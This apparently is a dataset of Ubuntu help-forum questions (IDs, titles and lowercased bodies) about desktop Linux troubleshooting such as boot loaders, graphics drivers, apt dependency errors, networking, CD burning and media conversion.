251394	`google-chrome` freezes upon launching - dbus.error	while trying to launch google-chrome from terminal , it launches successfully but shows the following : emre @ emre : ~ $ google-chrome [ 9258:9283:0205/003113 : error : object_proxy.cc ( 608 ) ] failed to get name owner . got org.freedesktop.dbus.error.namehasnoowner : could not get owner of name 'org.chromium.mtpd ' : no such name [ 9258:9283:0205/003113 : error : object_proxy.cc ( 608 ) ] failed to get name owner . got org.freedesktop.dbus.error.namehasnoowner : could not get owner of name 'org.chromium.mtpd ' : no such name [ 9258:9258:0205/003113 : error : object_proxy.cc ( 513 ) ] failed to call method : org.chromium.mtpd.enumeratestorage : object_path= /org/chromium/mtpd : org.freedesktop.dbus.error.serviceunknown : the name org.chromium.mtpd was not provided by any .service files plus , google chrome is not listed as installed in software center in any way . why is this so ?
251396	boot loader does n't offer windows 7 ?	i have two hdd one has windows 7 and i installed ubuntu on second hdd when i reboot there is no windows 7 option ?
251402	how to fix `` gpu lockup '' error , ubuntu froze after install	i installed ubuntu dual-booting alongside windows xp . after completing the install and rebooting , the machine froze , with this error message : gpu lockup- switching to software fbcon failed to idle channel 1 , 2 , 3 pgraph tlb flush idle timeout fail the graphics on the screen then went random and pixelated .
251406	only vga works ( not dvi ) - ubuntu 12.10	i just installed ubuntu 12.10 . for some reason i can not get the dvi to work . the monitor says : cable not connected . the vga cable works , but the everything looks blurry . the resolution is fine 1920 x 1200 and it even knows that i have benq 24 '' . i have 2 video cards . ah3450/htp/256m ( ati radeon hd 3450 ) agp ( ports : vga : ok dvi : not working ) . en7600gt/2dht/256m ( nvidia®’s geforce 7600gt ) pci-express ( ports : dvi : not working dvi : not working ) what should i do to get my dvi : s to work ?
251407	ubuntu partion size guide	i want to install ubuntu 12.04 on my laptop . how much i need for root , home and swap partition ? i have 3gb ram . i will use ubuntu for installing any kind of interesting packages and doing some programming . and , another question , can i use any partition ( which is being used by windows 7 ) as my home folder in ubuntu ?
251410	reset all google chrome settings on ubuntu	i enabled some experimental features in chrome ( using the about : flags page ) , and i 'm trying to reinstall it completely ( since it has begun to malfunction in various ways - for example , flash applets and extensions are no longer working . ) is there any way to completely reset google chrome on ubuntu , so that all default settings are restored ?
251412	ubuntu gnome - after install no grub menu	i have sucessfully installed ubuntu gnome next to win 7 os , but after install i get no grub menu . windows 7 just starts itself ignoring ubuntu completely . is there a way i can boot from ubuntu live cd and manualy create grub menu ? please post your sugestions below . thank you .
251416	where to publish useful customised functions	i have started to write a customise function , that encapsulates a bunch of actions that make my daily work easier . a few questions about sharing the function with the community : what would be the best way to share the function with the rest of the community ? 1 ) simply publish the code on a blog with the instructions to save it to a file , in a certain location ? 2 ) create a package and publish it in a ppa ? p.s . the code is in shell script .
251421	how can i add two bridged interfaces on seperate lans into kvm ?	i currently have a running server with multiple kvms running different servers within each , now i would like to add another separate interface to serve another group of kvms on the same server . there are currently three nic cards in the box nic 1 -- lan 1 -- host only nic 2 -- lan 1 -- br0 for the first set of kvms nic 3 -- lan 2 -- br1 for the second set of kvms when i run this one of the bridges shuts down , normally br0 taking the entire first set offline . this is my current interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth1 iface eth1 inet static address 192.168.1.20 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 # dns-* options are implemented by the resolvconf package , if installed dns-nameservers 8.8.8.8 4.2.2.6 8.8.4.4 dns-search firezen.com auto eth0 iface eth0 inet manual auto br0 iface br0 inet static address 192.168.1.21 network 192.168.1.0 netmask 255.255.255.0 broadcast 192.168.1.255 # gateway 192.168.1.1 bridge_ports eth0 bridge_stp off bridge_fd 0 bridge_maxwait 0 iface eth2 inet manual # auto br1 # iface br1 inet static # address 192.168.1.57 # network 192.168.1.0 # netmask 255.255.255.0 # broadcast 192.168.1.255 # gateway 192.168.1.1 # bridge_ports eth2 # bridge_stp off # bridge_fd 0 # bridge_maxwait 0 # auto br1 # iface br1 inet dhcp # bridge_ports eth2 # bridge_stp off < this was what i was using lastly , could not get # bridge_fd 0 the above to work . # bridge_maxwait 0 both networks are 192.168.1.x based . if you need any other information please let me know , and thank you in advanced .
251424	graphic driver problem in virtualbox with ubuntu 12.10	i have been running ubuntu perfectly in virtualbox for the paste 3 weeks , but suddenly this has gone a bit wrong . the gui wont start and it returns following error : i have tried the option to reconfigure but nothing happens , so i need to jump back to terminal . anybody familiar with this problem and how i can repair it ? while debugging i encountered another problem which i had not noticed . my dynamic disc is set to ~98gb but ubuntu does not exactly agree with me : df -h filesystem size used avail use % mounted on /dev/sda1 4.3g 4.3g 0 100 % / udev 1.1g 4.1k 1.1g 1 % /dev tmpfs 421m 750k 420m 1 % /run none 5.3m 0 5.3m 0 % /run/lock none 1.1g 0 1.1g 0 % /run/shm none 105m 8.2k 105m 1 % /run/user overflow 1.1m 0 1.1m 0 % /tmp if im not wrong my drive looks a bit full ?
251431	forward port 80 for multiple ip addresses on the same ubuntu server	i am using an ubuntu 12.10 server as a router/nat for an internal network to the internet . i have also configured the server to forward port 80 to a server sitting on my internal network . this all works fine . what i would like to do now is setup additional port forwarders to addition web servers using port 80 on my network . i have several other static internet addresses i can use externally and just need to setup forwarding to the local servers . i know i could just create additional ubuntu servers , configuring each of them with different internet addresses ( as well as local addresses on a 2nd nic ) and setting up port forwarding . is this possible to do with a single ubuntu server ? i tried adding more virtual nics to my single ubuntu server but ran into routing problems since all these additional nics were on the same internet subnet . is setting up individual ubuntu servers for each port forward i wish to do the only way to accomplish this ?
251432	where are nautilus loading animation icons located ?	when nautilus is loading a folder or searching for a file , there 's an animation like this : how can i change it to gnome-spinner ( humanity process-working ) ? i’ve searched all animation directories in /usr/share/icons/ but couldn’t find any png’s for such animation . thanks everyone in advance .
251435	unity notifications do not look normal ?	ok so i think this is because i am missing a package . my unity notifications ( ex . when unity tells me it is connected to a network ) look ugly . they used to be translucent chameleon rectangles . now they are white and totally different . see the picture below .
251437	k3b , basero or kfburn burn cd 's ?	ok , i 'm brand new at this ubuntu thing ( used windows 7 all my life ) and i need to know something ? can i burn cd 's on ubuntu 12.04 ? ? ? i 've tried basero , kfburn , and k3b and nothing . i 've looked here and everywhere for my problem and found nothing . kfburn simulates the burn perfectly , but when the player actually starts burning , it simply burns for a few minutes then stops ... all three programs . i have a blu ray player and that 's another problem for another time.. but for now : i downloaded a 45 minute video from youtube and used `` sound converter '' to convert it to an audio file ( wav . ogg . mp3 ect. ) . it plays fine on all the media players but i really do n't care what format it 's in , all i want is an audio cd that plays on a cd player . i 've loaded all the `` dependency '' packages from the repositories ( though i do n't really know what they are ) it told me to.. i do n't have alot of cd 's left so some guidance would be great at this point . here 's the bug report i got off of k3b ( shortened to the error ) if it helps.. thank you errno : 5 ( input/output error ) yes , i looked it up and was confused too.. my first problem was trying to get a fake raid logical disk using 2 sata ssd 's and it worked but with funny fdisk results saying devices matshita bd-mlt uj240as 1.02 ( /dev/sr0 , cd-r , cd-rw , cd-rom , dvd-rom , dvd-r , dvd-rw , dvd-r dl , bd-rom , bd-r , bd-re , dvd+r , dvd+rw , dvd+r dl ) [ dvd-rom , dvd-r sequential , dvd-r dual layer sequential , dvd-ram , dvd-rw restricted overwrite , dvd-rw sequential , dvd+rw , dvd+r , dvd+r dual layer , cd-rom , cd-r , cd-rw , bd-rom , bd-r sequential ( srm ) , bd-r random ( rrm ) , bd-re ] [ sao , tao , raw , raw/r16 , raw/r96p , raw/r96r , restricted overwrite , random recording , sequential recording , sequential recording + pow ] [ % 7 ] system k3b version : 2.0.2 kde version : 4.8.5 ( 4.8.5 ) qt version : 4.8.1 kernel : 3.2.0-36-generic used versions cdrecord : 1.1.11 cdrecord /usr/bin/wodim : operation not permitted . warning : can not raise rlimit_memlock limits . scsidev : '/dev/sr0' devname : '/dev/sr0' scsibus : -2 target : -2 lun : -2 linux sg driver version : 3.5.27 wodim version : 1.1.11 scsi buffer size : 64512 beginning dma speed test . set cdr_nodmatest environment variable if device communication breaks or freezes immediately after that . writing pregap for track 1 at -150 starting new track at sector : 0 track 01 : 0 of 457 mb written . track 01 : 1 of 457 mb written ( fifo 100 % ) [ buf 99 % ] 8.0x . errno : 5 ( input/output error ) , write_g1 scsi sendcmd : no error cdb : 2a 00 00 00 03 60 00 00 1b 00 status : 0x2 ( check condition ) sense bytes : f1 00 04 00 00 01 31 0a 00 32 7f 6e 09 90 00 00 sense key : 0x4 hardware error , deferred error , segment 0 sense code : 0x09 qual 0x90 ( track following error ) [ no matching qualifier ] fru 0x0 sense flags : blk 305 ( valid ) cmd finished after 0.038s timeout 200s /usr/bin/wodim : a write error occured . /usr/bin/wodim : please properly read the error message above . write track data : error after 2032128 bytes writing time : 30.244s average write speed 404.5x . fixating ... fixating time : 0.000s /usr/bin/wodim : fifo had 223 puts and 33 gets . /usr/bin/wodim : fifo was 0 times empty and 32 times full , min fill was 99 % . cdrecord command : /usr/bin/wodim -v gracetime=2 dev=/dev/sr0 speed=24 -sao driveropts=burnfree textfile=/tmp/qt_temp.ed9293 -useinfo -audio /tmp/kde-lucky1/k3b_audio_0_01.inf
251442	got /dev/sda1 will be checked for errors at next reboot in ubuntu 12.10 server virtual machine	problem i have this message called /dev/sda1/ will be checked for errors at next reboot when i booted up my vm running on ubuntu 12.10 server edition . my host os is mac os x lion . what i have tried i have googled and found this how can i get rid of the motd message `` *** /dev/sdb1 will be checked for errors at next reboot *** '' ? i tried sudo mv /var/run/motd /var/run/motd.old to force a clear of the current /etc/motd file as recommended in the first answer . no good . cat /etc/fstab gives me : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- server-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=18946e20-7bc6-40f3-b486-e46394546202 /boot ext2 defaults 0 2 /dev/mapper/ubuntu -- server-swap_1 none swap sw 0 0 this is what i got after i typed sudo blkid /dev/sda1 : uuid= '' 18946e20-7bc6-40f3-b486-e46394546202 '' type= '' ext2 '' /dev/sda5 : uuid= '' cxgz2v-pdtx-a0sr-7uxp-elvc-vbgy-c70hdz '' type= '' lvm2_member '' /dev/mapper/ubuntu -- server-root : uuid= '' 260b3094-5f4a-4839-9108-30ea0323393c '' type= '' ext4 '' /dev/mapper/ubuntu -- server-swap_1 : uuid= '' d8228f3c-80da-44df-9555-8be04129bf5b '' type= '' swap '' i also tried sudo touch /forcefsck did n't work . i saw this http : //www.iloveubuntu.net/how-repair-swap-partition-ubuntu but since i am running server edition i have no gui . please advise . thank you . update weirdly enough , the message is now gone . i have no idea why after i shut down my host os . this question is still open so that someone could help explain why this is the case .
251444	sometimes flash freezes in fullscreen mode . how can i just close it ?	almost every time i use youtube in fullscreen it freezes and does n't let me back to the desktop . i want to know if it 's possible close to it through the terminal or something like that . something easier then reboot the pc all the time .
251446	colorize hardlinks in ls output ?	how can i colorize hardlinks myself ? turns out on an old ubuntu 10.04 i have , this happens by default ( same .bashrc and .profile in use ) , whereas on the newer ubuntu 12.04 it does n't . this is the output on ubuntu 10.04 ( the one i desire ) : and this is the output on ubuntu 12.04 : the relevant file is .vimrc , however , .viminfo is an ordinary file with link count 1 , in contrast to the hardlinked .vimrc . of course the fact that gnu coreutils uses texinfo pages instead of man pages does n't make things easier . i found this here , but it does n't refer to the case i am looking for . tl ; dr : how to achieve coloring hardlinked ( as in : link count > 1 ) files the way i like in various ubuntu versions .
251448	unmet dependencies-broken packages	im a newbie to ubuntu . ive come across this while trying to install synaptic manager . however , later i observed that i get this sort of error whenever i try to install anything . also , when i go to update manager and click install updates , it displays this : *check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f : the following packages have unmet dependencies : linux-generic-pae : depends : linux-image-generic-pae ( = 3.2.0.37.44 ) but 3.2.0.37.45 is installed depends : linux-headers-generic-pae ( = 3.2.0.37.44 ) but 3.2.0.37.45 is installed* this is what i get in terminal : **problem : ** root @ gs-desktop : /home/gs # sudo apt-get install synaptic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic-pae : depends : linux-image-generic-pae ( = 3.2.0.37.44 ) but 3.2.0.37.45 is to be installed depends : linux-headers-generic-pae ( = 3.2.0.37.44 ) but 3.2.0.37.45 is to be installed synaptic : depends : libept1.4.12 but it is not going to be installed depends : libvte9 ( > = 1:0.24.0 ) but it is not going to be installed recommends : rarian-compat but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ gs-desktop : /home/gs # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-generic-pae the following packages will be upgraded : linux-generic-pae 1 upgraded , 0 newly installed , 0 to remove and 7 not upgraded . 1 not fully installed or removed . need to get 0 b/1,728 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.37.44 ) ; however : version of linux-image-generic-pae on system is 3.2.0.37.45. linux-generic-pae depends on linux-headers-generic-pae ( = 3.2.0.37.44 ) ; however : version of linux-headers-generic-pae on system is 3.2.0.37.45. dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please help me out with this problem and thanks in advance .
251449	should i use 32bit version of ubuntu 12.10 or 64bit version ?	after using ubuntu 12.10 for awhile on a separate computer , i decided to dual boot on my windows machine . the only bad thing is that i do not know which version of ubuntu 12.10 to use 32bit or 64bit . i have been using 12.10 on another computer but it was as 32bit version and people have been saying that some hardware might not be supported in 64bit . my build is : -i5 3570k -nvidia 560ti -8gb ram -asus mobo -two drives ( 320gb and 1tb ) any help on which version to use is greatly appreciated
251451	does a company writing c++ apps have to share its source code if it calls unmodified qt or ubuntu libraries ?	what is the relationship between ubuntu and qt and canonical ? the coming ubuntu phone looks interesting . ubuntu seems to be interwoven with qt . if my company wants to write commercial c++ apps calling qt ( or ubuntu ) libraries that my company has not modified , then i do not have to provide my company created source code with the app , correct ? thanks !
251456	how do i properly configure my screen edges to be non-sticky ?	i find the sticky edges feature to be quite annoying . i 'm using dual monitors and turned sticky edges off , however , when i pan the mouse from one monitor to the other , the mouse snaps to the edge . the only way to get the cursor to move from one monitor to the other is to move the mouse swiftly - but this creates less control for me , and is rather annoying . i 'm noticing with sticky edges off , i 'm easily to move my cursor from the my left ( primary ) monitor to the second monitor . however , the cursor sticks when moving the cursor from the right monitor back to the left . has anyone else encountered this issue , and is there a fix for it ?
251462	connecting ubuntu 12.04 to a fvs318g vpn using ipsec	i have a netgear prosafe fvs318g vpn appliance that i need to establish a vpn to . although you can download some vpn client software from the netgear website to establish the vpn , it 's windows only and i 'm running ubuntu on my desktop . it appears to be ipsec . how do i go about setting this up ? i tried installing the strongswan and network-manager-strongswan packages but when i try to add a vpn with the type set to ipsec/ikev2 , network manager sits there hung . how would i set this up ?
251463	mac dual boot fail to read ubuntu12.10 usb stick	i have a late 2011 macbook pro . partitioned off 40 gigs using the disk utility app . i have the refind boot manager correctly installed . followed ubuntu 's usb stick disk image instructions . checked the image using md5sum and got the correct hash back , the ubuntu-12.10-desktop-amd64.iso . when i restart , it brings me to refind 's menu . there 's a grub and a root usb stick options as well as the osx partition and the empty partition intended for ubuntu . if i go to the empty partition , there are doubles of the root and grub options . they all bring me to a same grub screen . when i try any of the options my screen goes black . when i 'm trying the `` install ubuntu '' option , i hear the chime after ~20 seconds , but then the screen continues to go black . considering that it was a graphics issue , i changed my resolution to 800x600 while in osx then restarted , i 'm not sure if those settings would carry over as refind seems to default to the highest resolution possible ( 1680x1050 ) . any theories or tips ? thanks in advance .
251464	screen size issues with cinnamon on 12.10	i use ubuntu 12.10 with gnome3 with no issues . i recently decided to try the cinnamon desktop environment . it installed without issue , and i can easily log in with cinnamon , but i get various screen issues . the resolution is at my native screen size , and the background and task bar fit my screen properly , but windows which have been set to full screen only fit the middle part of the screen . however , this appears to only be a visual issue , as i can close windows by clicking the seemingly empty space in the top-right , rather than where the close icon actually appears on the screen . additional information : i am using the most recent official release of the amd catalyst drivers . i have tried using other resolutions with no success .
251467	using wine to run ms office	i have just started to convert from microsoft windows to ubuntu . but during the transition i need to run the installed windows ms-office 2007 . i have tried , well , what i thought was the instructions but when trying to run power point it would just give me and error `` iopl not enabled '' , i right clicked the icon and tried to set permissions to run as an executable but it would not stay clicked .
251479	how to bind ctrl+arrows to home and end keys ? xmodmap does not work	on windows , i used to bind ctrl+left to home and ctrl + right to end via ahk . now i 'm struggling to achieve this behavior in ubuntu . i 've tried editing /etc/inputrc : '' \e [ 1 ; 5c '' : end-of-line '' \e [ 1 ; 5d '' : beginning-of-line it works but only in the terminal window . i 've also tried xmodmap : xmodmap -e `` keycode 113=left nosymbol home '' but it does not work . the strange thing here is that if i bind to shift + left in xmodmap it works : xmodmap -e `` keycode 113=left home '' my guess here is that the default behavior of ctrl + left ( skip words ) somehow gets priority over xmodmap bindings . where can i find where the default bindings are located and how to remove it ? or , maybe i could just bind needed behavior there ? i 'm on ubuntu 12.04
251480	simplest way to make a command run after system reboot	i have a server which exists to run one little django application . if the server reboots , i want django to start again : nohup /opt/myapp/manage.py runserver ... i 'm having trouble finding a simple way to make this run . there are tutorials explaining how to write full-fledged services , runlevels , init.d etc . but there must be a simpler way ? a place where i can hack this one extra line onto ? edit mark 's answer is perfect , the one-liner works out as : sudo sed -- in-place '/^exit 0/i\cd /opt/appdir\npython manage.py runserver ... . & ' /etc/rc.local
251486	how do i change the copy and paste keyboard shortcuts on lubuntu 12.10 ?	i have lubuntu 12.10 installed on my macbook pro and i am new to linux . i want to change the lubuntu keyboard shortcuts for copying and pasting . i want to change ctrl+c to cmd+c and to change ctrl+v to cmd+v . i want this to work on all applications like the lxterminal , web browser , text-editor , etc .
251487	unit of power in /sys/devices/system/cpu/cpu0/cpuidle/state0/power	the power consumed by a processor in a multicore in idle mode in linux is provided in the following file cat /sys/devices/system/cpu/cpu0/cpuidle/state0/power the output is : 4294967295 in linux documentation , it is given that the unit of power consumption in milli watt . that implies the above power = 4294 kilo watt . can some one help me to understand how this can be so huge ?
251488	xterm creates window in active workspace always ( how to put the window into background )	i have two workspaces : ws1 and ws2 . on ws1 , the script below is running in a konsole : for i in 1..1000 ; do xterm -e someprogram argx & ; xterm -e someprogram argy ; done when i switch to ws2 , these xterms starts to show up in ws2 . wherever i am , new windows always pop up on the active workspace . it distract a lot . how can i manage this ? i dont want to remove xterm -e , because once in a while i want to compare outputs of the two commands .
251496	default passwords for mythbuntu	i have downloaded and installed mythbuntu . very clean process . i now need to install shepherd for australian epg . when i wget 'http : //www.whuffy.com/shepherd/shepherd' it loads the file to my user directory but it should be in mythtv directory . when i try su mythtv i do not have the correct password for mythtv . i also do not know the password for running as root . i have tried passwords mythtv and mythbuntu without success . can you please advise what the default root and mythtv passwords are . regards glen
251497	unable to locate package minicom in ubuntu 10.10	reading package lists ... done building dependency tree reading state information ... done e : unable to locate package minicom i also ran sudo apt-get update and changed to universal from restricted in /etc/apt/sources.list but that did n't help .
251498	unable to install any package	when i try to install any application through terminal , i get this error : reading package lists ... error ! e : read error - read ( 21 : is a directory ) e : the package lists or status file could not be parsed or opened . and software center is also not opening . neither is synaptic package manager . it gives the following error when i try to open it : e : read error - read ( 21 : is a directory ) e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . solutions i tried so far , but did n't fix the problem : sudo rm -rf /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-amd64_packages sudo apt-get update sudo rm -rf /var/lib/apt/lists/* sudo apt-get update any suggestions ? i can not even use apt-get install .
251500	usb display adapter with linux/ubuntu drivers ?	i want to use my external monitor 's resolution fully ( 2560x1440 ) with a usb display adapter for my laptop . i have one with windows drivers , are there any adapter with linux / ubuntu drivers that can give me full resolution ? i am thinking of something like my current usb to displayport adapter . hdmi only gives 1920x1200 ( am using arandr to achieve this easily ) , and my laptop have n't got displayport . but i know that the graphic card can deliver 2560x1440 digitally or through an usb adapter .
251501	ca n't install ffmpeg in ubuntu	i tried to install ffmpeg in ubundu.using the command sudo apt-get install ffmpeg but i ca n't install it . it shows an error . following is the out put when i tried to install ffmpeg . wds @ wds : ~ $ sudo apt-get install ffmpeg [ sudo ] password for wds : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libavfilter1 the following new packages will be installed : ffmpeg libavfilter1 0 upgraded , 2 newly installed , 0 to remove and 3 not upgraded . need to get 357kb of archives . after this operation , 1,282kb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! libavfilter1 ffmpeg install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ maverick-updates/main libavfilter1 i386 4:0.6-2ubuntu6.3 404 not found [ ip : 91.189.91.15 80 ] err http : //security.ubuntu.com/ubuntu/ maverick-security/main libavfilter1 i386 4:0.6-2ubuntu6.3 404 not found [ ip : 91.189.92.200 80 ] err http : //security.ubuntu.com/ubuntu/ maverick-security/main ffmpeg i386 4:0.6-2ubuntu6.3 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/ffmpeg/libavfilter1_0.6-2ubuntu6.3_i386.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/ffmpeg/ffmpeg_0.6-2ubuntu6.3_i386.deb 404 not found [ ip : 91.189.92.200 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? wds @ wds : ~ $ it shows a 404 error.when installing .
251503	what is the `` grub prompt '' ? / unknown prompt	i am a entry level person for ubuntu using 11.10 currently trying to install it on a hdd . i have a p4 and 10gb hdd totally dedicated to ubuntu 11.10 . i am installing from a dvd . i need to change some grub configuration but am unable to get the grub prompt as per the graphics it should be something like grub > but all i am getting is ubuntu @ ubuntu : ~ $ what does this ubuntu @ ubuntu : ~ $ prompt stand for ? i got the graphical menu for ubuntu telling me test ubuntu without installing install ubuntu ... . memory test etc and 3 more menus . i selected install ubuntu and proceeded but got no grub . i am totally confused about the grub prompt . i am not getting it and got the above one . . the documentataion says to press esc / right shift key at the time of boot . am i expected to press esc key right after the first bios beep or the second bios beep or when ? ? i did not get the grub prompt even after pressing the right shift key after first bios beep . i am confused about the timing . when & which key to be pressed and at what time to get the grub prompt ? ? ? i have tried various ways to get the grub prompt but i do n't get it and eventually i reach the ubuntu installation menu where i select the install ubuntu option and after that i press shift ctrl f1 where i get the above menu . also i am getting a boot : prompt in early stage i do not know about it also what is that prompt let me know what key combinations to use and exactly when after the first bios beep to get the grub prompt .
251506	ubuntu is crashed while booting up	i 'm dual booting w7 and ubuntu ( installed from wubi ) . i 've had it up and running a few times but today , i have pressed power button multiple times while booting up and i 'm getting a message from windows boot manager when i select ubuntu that wubildr.mbr is missing or corrupt . any help would be greatly appreciated . i have installed on g drive and the .mbr file got corrupted.i thought of uninstalling it.but now g drive itself is is not opening.lots of other data is also in g drive.kindly help me in fixing this issue.am getting the below error when trying to open g drive . g drive is not accessible because of an i/o device error . how to proceed further.because of this , windows boot up process is taking more time than usual
251509	problem to update ubuntu 12.10	when trying to update ubuntu , i receive the following failed error message . w : failed to fetch http : // ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : // ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found , w : failed to fetch http : // ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . anyone could help me to solve that ?
251510	installing 12.04 on usb	i have a samsung series 9 notebook . it only has 128 gb of ssd storage , and i want to be able to use ubuntu 12.04 on it . can i install ubuntu onto a usb ? not to use it for installing onto my computer , but to natively run on it and act like hard drive . the usb is 32gb and if it can be done , how would i go about doing it ? cheers .
251511	how can i dub an audio track over a video i 'm making with avconv ?	so to start out with , i having figured out how to animate a number of still frames into a video , like this : avconv -f image2 -i % 06d.png -r 24 -qscale 1 aniron.avi i have a bunch of files in the directory named 000000.png , 000001.png , 000002.png . i am able to make a video of sufficiently high quality this way . however , efforts to add an audio track by putting `` -i aniron.mp3 '' and a few other options have failed thus far . i always get this : avconv version 0.8.5-4:0.8.5-0ubuntu0.12.04.1 , copyright ( c ) 2000-2012 the libav developers built on jan 24 2013 18:03:14 with gcc 4.6.3 [ mp3 @ 0x8623aa0 ] max_analyze_duration reached [ mp3 @ 0x8623aa0 ] estimating duration from bitrate , this may be inaccurate input # 0 , mp3 , from 'aniron.mp3 ' : metadata : encoder : lavf52.64.2 tdtg : 2012-07-28t18:05:36 duration : 00:07:11.46 , start : 0.000000 , bitrate : 191 kb/s stream # 0.0 : audio : mp3 , 44100 hz , stereo , s16 , 192 kb/s input # 1 , image2 , from ' % 06d.png ' : duration : 00:07:09.88 , start : 0.000000 , bitrate : n/a stream # 1.0 : video : png , rgb24 , 1920x1080 , 25 fps , 25 tbr , 25 tbn , 25 tbc file 'aniron.avi ' already exists . overwrite ? [ y/n ] y incompatible pixel format 'rgb24 ' for codec 'mpeg4 ' , auto-selecting format 'yuv420p' [ buffer @ 0x8629500 ] w:1920 h:1080 pixfmt : rgb24 [ avsink @ 0x8657d60 ] auto-inserting filter 'auto-inserted scaler 0 ' between the filter 'src ' and the filter 'out' [ scale @ 0x8634940 ] w:1920 h:1080 fmt : rgb24 - > w:1920 h:1080 fmt : yuv420p flags:0x4 incompatible sample format 's16 ' for codec 'ac3 ' , auto-selecting format 'flt' [ ac3 @ 0x86438e0 ] invalid bit rate output # 0 , avi , to 'aniron.avi ' : metadata : encoder : lavf52.64.2 tdtg : 2012-07-28t18:05:36 stream # 0.0 : video : mpeg4 , yuv420p , 1920x1080 , q=2-31 , 200 kb/s , 90k tbn , 24 tbc stream # 0.1 : audio : ac3 , 44100 hz , stereo , flt , 200 kb/s stream mapping : stream # 1:0 - > # 0:0 ( png - > mpeg4 ) stream # 0:0 - > # 0:1 ( mp3 - > ac3 ) error while opening encoder for output stream # 0:1 - maybe incorrect parameters such as bit_rate , rate , width or height i may just end up doing this in kdenvlive but this is bugging me .
251517	bug in ubuntu installer ?	if i install ubuntu ( 12.10 64 bit ) on a mbr formatted hard disk , based on a efi system , i should get the partition type 0xef for the efi system partition but instead i retrieve 0x0b what stands for a fat32 formatted volume . the system is working anyway but i spent a lot of time with that . # dd if=/dev/sda bs=512 count=1 | hexdump -c 00000000 fa b8 00 10 8e d0 bc 00 b0 b8 00 00 8e d8 8e c0 00000010 fb be 00 7c bf 00 06 b9 00 02 f3 a4 ea 21 06 00 00000020 00 be be 07 38 04 75 0b 83 c6 10 81 fe fe 07 75 00000030 f3 eb 16 b4 02 b0 01 bb 00 7c b2 80 8a 74 01 8b 00000040 4c 02 cd 13 ea 00 7c 00 00 eb fe 00 00 00 00 00 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 * 000001b0 00 00 00 00 00 00 00 00 6e f9 08 00 00 00 80 20 000001c0 21 00 0b 1c 10 0c 00 08 00 00 00 f0 02 00 00 1c 000001d0 11 0c 83 ad 31 3c 00 f8 02 00 00 e8 0b 00 00 ad 000001e0 32 3c 82 d6 05 91 00 e0 0e 00 00 e0 14 00 00 f6 000001f0 24 91 05 fe ff ff fe c7 23 00 02 30 1c 01 55 aa so my question is if this is a bug of the installer or at least an undocumented feature but basically it 's not correct ... thx & bye tom
251518	why is eclipse juno on my lenovo w530 with 12.04 so slow ?	i got a new lenovo w530 with 16 gb of ram and 280 gb ssd with nvidia quadro k2000m graphics with 2gb ddr3 memory . after trying to make 12.10 to work with dual external monitor and failed , i moved to 12.04 . my problem is with compiz and eclipse : first , eclipse is very slow - the search screen can take 30 seconds to load ( the display becomes grey and after 30-60 seconds it is live again ) . actually i ca n't work with eclipse because of this problem . i removed all the plugins and marked the other to not load at start up . i changed in my eclipse.ini to -xms512m -xmx1024m and then to -xmx4096m . in addition to this problem - generally it seems like compiz is killing my coputer - it consumes up to 10 gb of ram . i tried to log-in with ubuntu 2d - and the eclipse problem is still there . i tried using gnome-classic but : a . it has problems of its own ( alt-shift not working , etc . ) b. i do n't want to give up on unity - i really like it . i 'm not sure if the problems are related . please remember that i 'm new in the linux world . -- update i 've got back to indigo and everything is working great . still , juno has some great features ...
